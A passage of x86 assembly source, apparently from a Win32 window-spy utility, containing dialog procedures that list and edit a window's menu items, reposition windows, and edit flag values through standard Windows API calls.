	mov	edx,OFFSET menulistmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit
.initdlg:	; INITDIALOG
	stdcall [GetSystemMetrics],SM_CYSCREEN
	sar	eax,1
	sub	eax,240 shr 1
	push	eax
	stdcall [GetSystemMetrics],SM_CXSCREEN
	sar	eax,1
	sub	eax,600 shr 1
	pop	ecx
	stdcall [MoveWindow],[hWnd],eax,ecx,600,240,1
	mov	[lvc.mask],LVCF_TEXT
	mov	[lvc.pszText],OFFSET szColTitle
	and	[lvc.iSubItem],0
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,0,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColID
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,1,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColType
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,2,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColState
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,3,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColItemData
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,4,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColSubMenu
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_INSERTCOLUMN,5,OFFSET lvc
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall [GetDlgItem],[hWnd],ID_MENULIST_MENULIST
	and	[lvi.iItem],0
	stdcall AddMenuList,ebx,eax,0
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,IDM_MENU_EDIT	 ; Edit
	.edit:	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	[lvi.mask],LVIF_IMAGE+LVIF_PARAM
		mov	[lvi.iItem],eax
		and	[lvi.iSubItem],0
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		cmp	[lvi.iImage],2
		je	.quit
		cmp	[lvi.iImage],3
		je	.quit
		mov	ebx,[lvi.lParam]
	@@:	stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	[lvi.lParam],eax
		dec	[lvi.iItem]
		jl	@F
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		cmp	[lvi.iImage],2
		je	@F
		cmp	[lvi.iImage],3
		jne	@B
	@@:	mov	[mii.cbSize],sizeof.MENUITEMINFO
		mov	[mii.fMask],MIIM_DATA+MIIM_ID+MIIM_STATE+MIIM_TYPE
		mov	[mii.dwTypeData],OFFSET szTitle
		mov	[mii.cch],200h
		stdcall [GetMenuItemInfo],[lvi.lParam],ebx,1,OFFSET mii
		stdcall [DialogBoxParam],[hInstance],IDD_EDITMENU,[hWnd],OFFSET DlgEditMenuProc,OFFSET mii
		test	eax,eax
		jz	.quit
		stdcall [SetMenuItemInfo],[lvi.lParam],ebx,1,OFFSET mii
	.elseif ax,e,IDM_MENU_INSERT	; Insert
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	ebx,eax
		mov	[lvi.mask],LVIF_IMAGE+LVIF_PARAM
		mov	[lvi.iItem],eax
		and	[lvi.iSubItem],0
	@@:	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		cmp	[lvi.iImage],2
		je	@F
		cmp	[lvi.iImage],3
		je	@F
		dec	[lvi.iItem]
		jge	@B
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	[lvi.lParam],eax
	@@:	mov	[mii.cbSize],sizeof.MENUITEMINFO
		mov	[mii.fMask],MIIM_DATA+MIIM_ID+MIIM_STATE
		stdcall [DialogBoxParam],[hInstance],IDD_EDITMENU,[hWnd],OFFSET DlgEditMenuProc,OFFSET mii
		test	eax,eax
		jz	.quit
		sub	ebx,[lvi.iItem]
		dec	ebx
		stdcall [InsertMenuItem],[lvi.lParam],ebx,1,OFFSET mii
	.endif
	jmp	.quit
.setfocus:	; SETFOCUS
	stdcall [GetDlgItem],[hWnd],ID_MENULIST_MENULIST
	stdcall [SetFocus],eax
	jmp	.quit
.notify:	; NOTIFY
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_KEYDOWN
		movzx	eax,[eax+LVKEYDOWN.wVKey]
		cmp	eax,VK_ADD
		je	@F
		cmp	eax,VK_SUBTRACT
		je	@F
		jmp	.quit
	.elseif [eax+NMHDR.code],e,NM_RETURN
		jmp	@F
	.elseif [eax+NMHDR.code],e,NM_DBLCLICK
	@@:	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	[lvi.mask],LVIF_IMAGE+LVIF_INDENT
		mov	[lvi.iItem],eax
		and	[lvi.iSubItem],0
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		cmp	[lvi.iImage],IDI_COLLAPSED	; expand item
		je	.exp
		cmp	[lvi.iImage],IDI_EXPANDED	; collapse item
		jne	.edit
		; collapse
		dec	[lvi.iImage]
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETITEM,0,OFFSET lvi
		xor	[lvi.mask],LVIF_IMAGE
		inc	[lvi.iItem]
		mov	ebx,[lvi.iIndent]
	@@:	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		test	eax,eax
		jz	.quit
		cmp	ebx,[lvi.iIndent]
		jae	.quit
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_DELETEITEM,[lvi.iItem],0
		jmp	@B
		jmp	.quit
	.exp:	; expand
		inc	[lvi.iImage]
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETITEM,0,OFFSET lvi
		xor	[lvi.mask],LVIF_IMAGE+LVIF_TEXT+LVIF_INDENT
		mov	[lvi.pszText],OFFSET szHandle
		mov	[lvi.cchTextMax],10h
		add	[lvi.iSubItem],5
		stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_GETITEM,0,OFFSET lvi
		stdcall [GetDlgItem],[hWnd],ID_MENULIST_MENULIST
		mov	ebx,eax
		stdcall hstr2dw,OFFSET szHandle
		inc	[lvi.iItem]
		inc	[lvi.iIndent]
		stdcall AddMenuList,eax,ebx,[lvi.iIndent]
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],2
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.endif
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_MENULIST_MENULIST
	movsx	ebx,word [lParam+00h]
	movsx	ecx,word [lParam+02h]
	stdcall [MoveWindow],eax,0,0,ebx,ecx,1
	sub	ebx,40+64+64
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	mov	eax,ebx
	mov	ecx,3
	cdq
	idiv	ecx
	mov	ebx,eax
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,0,ebx
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,1,40
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,2,ebx
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,3,ebx
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,4,64
	stdcall [SendDlgItemMessage],[hWnd],ID_MENULIST_MENULIST,LVM_SETCOLUMNWIDTH,5,64
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc AddMenuList,hMenu,hListView,dwDepth
	enter
	push	ebx esi edi
	mov	[lvi.pszText],OFFSET szTitle
	xor	ebx,ebx
	mov	[mii.cbSize],sizeof.MENUITEMINFO
	mov	[mii.fMask],MIIM_DATA+MIIM_ID+MIIM_STATE+MIIM_SUBMENU+MIIM_TYPE
	mov	[mii.dwTypeData],OFFSET szTitle
	mov	[mii.cch],200h
.next:	stdcall [GetMenuItemInfo],[hMenu],ebx,1,OFFSET mii
	test	eax,eax
	jz	.quit
	cmp	[mii.fType],MFT_SEPARATOR
	je	.sep
.str:	stdcall [GetMenuString],[hMenu],ebx,OFFSET szTitle,200h,MF_BYPOSITION
	xor	eax,eax
	mov	esi,OFFSET szTitle
	mov	edi,esi
.extabs:lodsb
	cmp	eax,"&"
	je	.extabs
	cmp	eax,09h
	jne	@F
	xor	eax,09h xor " "
@@:	stosb
	test	eax,eax
	jnz	.extabs
	jmp	.add
.sep:	mov	edi,OFFSET szTitle
	mov	eax,"----"
	mov	ecx,3
	rep	stosd
	xor	eax,eax
	stosb
.add:	mov	[lvi.mask],LVIF_TEXT+LVIF_IMAGE+LVIF_PARAM
	and	[lvi.iSubItem],0			; ID
	mov	[lvi.pszText],OFFSET szTitle		; Title
	and	[lvi.iImage],0				; blank
	test	[mii.fState],MFS_CHECKED
	jz	@F
	inc	[lvi.iImage]				; checked
@@:	mov	eax,[mii.hSubMenu]
	cmp	eax,0
	mov	[lvi.lParam],ebx
	je	@F
	mov	[lvi.iImage],3				; expanded
	mov	[lvi.lParam],eax
@@:	stdcall [SendMessage],[hListView],LVM_INSERTITEM,0,OFFSET lvi
	xor	[lvi.mask],LVIF_PARAM
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szHandle
	ccall	[wsprintf],OFFSET szHandle,OFFSET szIDFormat,[mii.wID]
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szFlags		; Type
	stdcall GetFlags,[mii.fType],OFFSET menuitemtypes,OFFSET szFlags,1
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szFlags		; State
	stdcall GetFlags,[mii.fState],OFFSET menuitemstates,OFFSET szFlags,0
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szHandle		; Item Data
	ccall	[wsprintf],OFFSET szHandle,OFFSET szHandleFormat,[mii.dwItemData]
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szHandle		; Sub Menu Handle
	ccall	[wsprintf],OFFSET szHandle,OFFSET szHandleFormat,[mii.hSubMenu]
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	mov	eax,[dwDepth]
	xor	[lvi.mask],LVIF_TEXT+LVIF_INDENT
	and	[lvi.iSubItem],0
	mov	[lvi.iIndent],eax
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iItem]
	inc	ebx
	cmp	[mii.hSubMenu],0
	je	.next
	mov	eax,[dwDepth]
	inc	eax
	stdcall AddMenuList,[mii.hSubMenu],[hListView],eax
	jmp	.next
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgEditMenuProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET editmenumsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	; ID
	stdcall [SetDlgItemInt],[hWnd],ID_EDITMENU_ID,[ebx+MENUITEMINFO.wID],0
	; Type
	stdcall GetFlags,[ebx+MENUITEMINFO.fType],OFFSET menuitemtypes,OFFSET szFlags,1
	stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_TYPE,OFFSET szFlags
	; State
	stdcall GetFlags,[ebx+MENUITEMINFO.fState],OFFSET menuitemstates,OFFSET szFlags,0
	stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_STATE,OFFSET szFlags
	; Type Data
	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,[ebx+MENUITEMINFO.dwTypeData]
	stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_TYPEDATA,OFFSET szValue
	; Item Data
	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,[ebx+MENUITEMINFO.dwItemData]
	stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_ITEMDATA,OFFSET szValue
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if eax,e,(EN_KILLFOCUS shl 16 + ID_EDITMENU_ID)		; ID
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemInt],[hWnd],ID_EDITMENU_ID,0,0
		mov	[ebx+MENUITEMINFO.wID],eax
	.elseif ax,e,ID_EDITMENU_EDITTYPE	; Edit Type
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		push	1 menuitemtypes [eax+MENUITEMINFO.fType]
		stdcall [DialogBoxParam],[hInstance],IDD_FLAGS,[hWnd],OFFSET DlgFlagsProc,esp
		add	esp,0Ch
		mov	[ebx+MENUITEMINFO.fType],eax
		stdcall GetFlags,eax,OFFSET menuitemtypes,OFFSET szFlags,1
		stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_TYPE,OFFSET szFlags
	.elseif ax,e,ID_EDITMENU_EDITSTATE	; Edit State
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		push	0 menuitemstates [eax+MENUITEMINFO.fState]
		stdcall [DialogBoxParam],[hInstance],IDD_FLAGS,[hWnd],OFFSET DlgFlagsProc,esp
		add	esp,0Ch
		mov	[ebx+MENUITEMINFO.fState],eax
		stdcall GetFlags,eax,OFFSET menuitemstates,OFFSET szFlags,0
		stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_STATE,OFFSET szFlags
	.elseif eax,e,(EN_KILLFOCUS shl 16 + ID_EDITMENU_TYPEDATA)	; Type Data
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowText],[lParam],OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		mov	[ebx+MENUITEMINFO.dwTypeData],eax
		ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,eax
		stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_TYPEDATA,OFFSET szValue
	.elseif ax,e,ID_EDITMENU_EDITTYPEDATA	; Edit Type Data
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall InputBox,OFFSET szChangeTitle,[eax+MENUITEMINFO.dwTypeData],200h
	.elseif eax,e,(EN_KILLFOCUS shl 16 + ID_EDITMENU_ITEMDATA)	; Item Data
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowText],[lParam],OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		mov	[ebx+MENUITEMINFO.dwItemData],eax
		ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,eax
		stdcall [SetDlgItemText],[hWnd],ID_EDITMENU_ITEMDATA,OFFSET szValue
	.elseif ax,e,ID_EDITMENU_OK		; OK
		stdcall [PostMessage],[hWnd],WM_CLOSE,1,0
	.elseif ax,e,ID_EDITMENU_CANCEL 	; Cancel
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgChPosProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET chposmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	stdcall [CheckDlgButton],[hWnd],ID_CHPOS_SCREEN,BST_CHECKED
	stdcall [PostMessage],[hWnd],WM_COMMAND,(BN_CLICKED shl 16 + ID_CHPOS_SCREEN),0
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if eax,e,(BN_CLICKED shl 16 + ID_CHPOS_SCREEN) ; Screen
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetWindowRect],eax,OFFSET rc
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_LEFT,[rc.left],1
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_TOP,[rc.top],1
		mov	eax,[rc.right]
		sub	eax,[rc.left]
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_WIDTH,eax,1
		mov	eax,[rc.bottom]
		sub	eax,[rc.top]
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_HEIGHT,eax,1
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_LEFT
		stdcall [EnableWindow],eax,1
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_TOP
		stdcall [EnableWindow],eax,1
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_CENTER
		stdcall [EnableWindow],eax,1
	.elseif eax,e,(BN_CLICKED shl 16 + ID_CHPOS_CLIENT)	; Client
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetClientRect],eax,OFFSET rc
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_LEFT,0,1
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_TOP,0,1
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_WIDTH,[rc.right],1
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_HEIGHT,[rc.bottom],1
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_LEFT
		stdcall [EnableWindow],eax,0
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_TOP
		stdcall [EnableWindow],eax,0
		stdcall [GetDlgItem],[hWnd],ID_CHPOS_CENTER
		stdcall [EnableWindow],eax,0
	.elseif ax,e,ID_CHPOS_SET	; Set
		stdcall [IsDlgButtonChecked],[hWnd],ID_CHPOS_SCREEN
		test	eax,eax
		jz	@F
		; screen
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_LEFT,0,1
		mov	[rc.left],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_TOP,0,1
		mov	[rc.top],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_WIDTH,0,1
		mov	[rc.right],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_HEIGHT,0,1
		mov	[rc.bottom],eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [MoveWindow],eax,[rc.left],[rc.top],[rc.right],[rc.bottom],1
		jmp	.quit
	@@:	; client
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowRect],eax,OFFSET rc
		stdcall [GetClientRect],ebx,OFFSET rcClient
		mov	eax,[rcClient.right]
		mov	ecx,[rcClient.bottom]
		add	eax,[rc.left]
		add	ecx,[rc.top]
		sub	[rc.right],eax
		sub	[rc.bottom],ecx
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_WIDTH,0,1
		add	[rc.right],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_HEIGHT,0,1
		add	[rc.bottom],eax
		stdcall [MoveWindow],ebx,[rc.left],[rc.top],[rc.right],[rc.bottom],1
	.elseif ax,e,ID_CHPOS_CENTER	; Center
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_LEFT,0,1
		mov	[rc.left],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_TOP,0,1
		mov	[rc.top],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_WIDTH,0,1
		mov	[rc.right],eax
		stdcall [GetDlgItemInt],[hWnd],ID_CHPOS_HEIGHT,0,1
		mov	[rc.bottom],eax
		stdcall [GetSystemMetrics],SM_CXSCREEN
		sub	eax,[rc.right]
		sar	eax,1
		mov	[rc.left],eax
		stdcall [GetSystemMetrics],SM_CYSCREEN
		sub	eax,[rc.bottom]
		sar	eax,1
		mov	[rc.top],eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [MoveWindow],eax,[rc.left],[rc.top],[rc.right],[rc.bottom]
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_LEFT,[rc.left],1
		stdcall [SetDlgItemInt],[hWnd],ID_CHPOS_TOP,[rc.top],1
	.elseif ax,e,ID_CHPOS_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgSendMsgProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET sendmsgmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	ccall	[wsprintf],OFFSET szHandle,OFFSET szHandleFormat,ebx
	stdcall [SetDlgItemText],[hWnd],ID_SENDMSG_HWND,OFFSET szHandle
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_SENDMSG_SENDMSG	; Send Message
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.elseif ax,e,ID_SENDMSG_POSTMSG ; Post Message
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgFlagsProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET flagsmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit
.initdlg:	; INITDIALOG
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	stdcall [SetWindowLong],[hWnd],DWL_USER,[ebx]
	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,[ebx]
	stdcall [SetDlgItemText],[hWnd],ID_FLAGS_FLAGS,OFFSET szValue
	stdcall [CreateFont],13,0,0,0,FW_NORMAL,0,0,0,DEFAULT_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS,DEFAULT_QUALITY,DEFAULT_PITCH+FF_DONTCARE,OFFSET szFontName
	mov	[hFontList],eax
	stdcall [CreateFont],13,0,0,0,FW_BOLD,0,0,0,DEFAULT_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS,DEFAULT_QUALITY,DEFAULT_PITCH+FF_DONTCARE,OFFSET szFontName
	mov	[hFontListBold],eax
	stdcall [CheckDlgButton],[hWnd],ID_FLAGS_NAMED,BST_CHECKED
	stdcall [PostMessage],[hWnd],WM_COMMAND,(BN_CLICKED shl 16 + ID_FLAGS_NAMED),0
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if eax,e,(BN_CLICKED shl 16 + ID_FLAGS_NAMED)	; Named
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [SendDlgItemMessage],[hWnd],ID_FLAGS_LIST,LB_RESETCONTENT,0,0
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_LIST
		stdcall AddFlagsList,eax,[ebx+04h],[ebx+08h]
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_ADDITIONALLABEL
		stdcall [EnableWindow],eax,1
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_ADDITIONAL
		stdcall [EnableWindow],eax,1
		jmp	.show
	.elseif eax,e,(BN_CLICKED shl 16 + ID_FLAGS_BINARY)	; Binary
		stdcall [SendDlgItemMessage],[hWnd],ID_FLAGS_LIST,LB_RESETCONTENT,0,0
		xor	ebx,ebx
	@@:	mov	esi,01h
		mov	ecx,ebx
		shl	esi,cl
		ccall	[wsprintf],OFFSET szValue,OFFSET szBitFormat,ebx,esi
		stdcall [SendDlgItemMessage],[hWnd],ID_FLAGS_LIST,LB_ADDSTRING,0,OFFSET szValue
		stdcall [SendDlgItemMessage],[hWnd],ID_FLAGS_LIST,LB_SETITEMDATA,eax,esi
		inc	ebx
		cmp	ebx,32
		jl	@B
		stdcall [SetDlgItemText],[hWnd],ID_FLAGS_FLAGS,OFFSET szValue
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_ADDITIONALLABEL
		stdcall [EnableWindow],eax,0
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_ADDITIONAL
		stdcall [EnableWindow],eax,0
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		jmp	.show
	.elseif eax,e,(LBN_DBLCLK shl 16 + ID_FLAGS_LIST)	; List
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [SendMessage],[lParam],LB_GETCURSEL,0,0
		stdcall [SendMessage],[lParam],LB_GETITEMDATA,eax,0
		xor	[ebx],eax
		jmp	.show
	.elseif eax,e,(EN_KILLFOCUS shl 16 + ID_FLAGS_ADDITIONAL)    ; Additional
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowText],[lParam],OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		push	eax
		stdcall CombineFlags,4,dword [ebx+04h]
		and	eax,[ebx]
		pop	ecx
		or	eax,ecx
		mov	[ebx],eax
		jmp	.show
	.elseif eax,e,(EN_KILLFOCUS shl 16 + ID_FLAGS_FLAGS)	; Flags
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowText],[lParam],OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		mov	[ebx],eax
	 .show: stdcall CombineFlags,4,dword [ebx+04h]
		mov	esi,[ebx]
		mov	edi,[ebx]
		and	esi,eax
		not	eax
		and	edi,eax
		stdcall [IsDlgButtonChecked],[hWnd],ID_FLAGS_BINARY
		test	eax,eax
		jz	@F
		mov	esi,[ebx]
	@@:	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,esi
		stdcall [SetDlgItemText],[hWnd],ID_FLAGS_FLAGS,OFFSET szValue
		ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,edi
		stdcall [SetDlgItemText],[hWnd],ID_FLAGS_ADDITIONAL,OFFSET szValue
		stdcall [SendDlgItemMessage],[hWnd],ID_FLAGS_LIST,LB_GETCOUNT,0,0
		stdcall [GetDlgItem],[hWnd],ID_FLAGS_LIST
		stdcall [RedrawWindow],eax,0,0,RDW_INVALIDATE
	.elseif ax,e,ID_FLAGS_OK	; OK
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	eax,[eax]
		stdcall [PostMessage],[hWnd],WM_CLOSE,eax,0
	.elseif ax,e,ID_FLAGS_CANCEL	; Cancel
		stdcall [GetWindowLong],[hWnd],DWL_USER
		stdcall [PostMessage],[hWnd],WM_CLOSE,eax,0
	.endif
	jmp	.quit
.measureitem:	; MEASUREITEM
	cmp	[wParam],ID_FLAGS_LIST
	jne	.quit
	mov	eax,[lParam]
	mov	[eax+MEASUREITEMSTRUCT.itemHeight],18
	jmp	.quit
.drawitem:	; DRAWITEM
